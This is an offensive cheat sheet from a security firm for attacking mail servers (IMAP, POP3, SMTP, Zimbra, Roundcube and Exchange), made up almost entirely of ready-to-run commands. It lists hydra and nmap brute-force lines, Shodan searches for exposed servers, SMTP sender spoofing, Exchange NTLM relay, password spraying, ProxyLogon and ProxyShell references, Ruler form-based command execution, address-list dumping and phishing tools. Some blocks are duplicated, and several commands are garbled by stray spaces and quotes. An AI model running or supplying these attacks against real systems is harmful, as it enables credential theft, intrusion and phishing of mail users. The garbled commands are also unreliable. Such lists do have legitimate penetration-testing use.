A cheat sheet that contains common enumeration and attack methods for Mail Server.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP]
nc -nv <IP> 993 [IP]
shodan search "port:143"
telnet example.com 143
a1 AUTHENTICATE NTLM
nmap --script=imap-ntlm-info [IP]
hydra -l USERNAME -P passwords.txt -f [IP] imap -V
hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V
nmap -sV --script imap-brute -p [PORT] [IP]
nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP]
nc -nv <IP> 110 [IP]
shodan search "port:995"
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port [PORT] [IP]
a1 AUTHENTICATE NTLM
nmap -p110 --script pop3-brute <target>
hydra -l muts -P pass.txt [IP] pop3
nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP]
nc -nv <IP> 25 [IP]
nc -nv <IP> 465 [IP]
nc -nv <IP> 587 [IP]
shodan search "port:25"
shodan search "port:465"
shodan search "port:587"
telnet example.com 587
HELO
AUTH NTLM 334
a1 AUTHENTICATE NTLM
nmap -p[25,465,587] --script smtp-brute <target>
hydra -l muts -P pass.txt [IP] smtp
emkei.cz
telnet [IP] [25 or 465 or 587]
MAIL FROM: [email protected]
RCPT TO: [email protected]
SUBJECT: Test message
.
shodan search "8.8.6_GA_1906"
shodan search "zimbra"
modules/auxiliary/gather/memcached_extractor
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
gophish
CVE‑2022‑37042
CVE‑2022‑37041
CVE‑2022‑37044
POST
shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'"
shodan search "http.favicon.hash:976235259"
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
gophish
2021-44026
POST
shodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange"
autodiscover/autodiscover.xml
ProxyLogon(2021-26855)
ProxyShell(2021-34473)
HAFNIUM(2021-26858)
Invoke-PasswordSprayOWA
Invoke-PasswordSprayEWS
nmap --script http-ntlm-info
reponder
./exchangeRelayx.py -t https://mail.evil.com
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName
domain\username -Password password -OutFile global-address-list.txt
Bloodhound
net
GUI
Ruler
./ruler --email [email protected] form add --suffix superduper --input command.txt --send
evilmacro
macropack
...
LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'
peas -U ' EVIL.DEC\user’ -p ‘password’ exch01.evil.dev - -smb-user=‘EVIL\sharepoint-setup'
• - smb-pass=' password’ •-list-unc 'http://SHP01/share’
nmap mail.evil.dev -p 6001 -sV - sC
rpcmap . py -debug -auth-transport’EVIL/user:password’
'ncacn http: /6001,RpcProxy=mail.evil.dev: 443]'
rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'
LDAPPER. py -D EVIL - U 'Administrator' -P ‘password’ -S DC01. EVIL.DEV
([email protected]) mail objectGUID legacyExchangeDN distinguishedName
exchanger. py EVIL/user: ‘password’@mail.evil.dev nspi
dump -tables -name Hackers -lookup-tvpe EXTENDED
gophish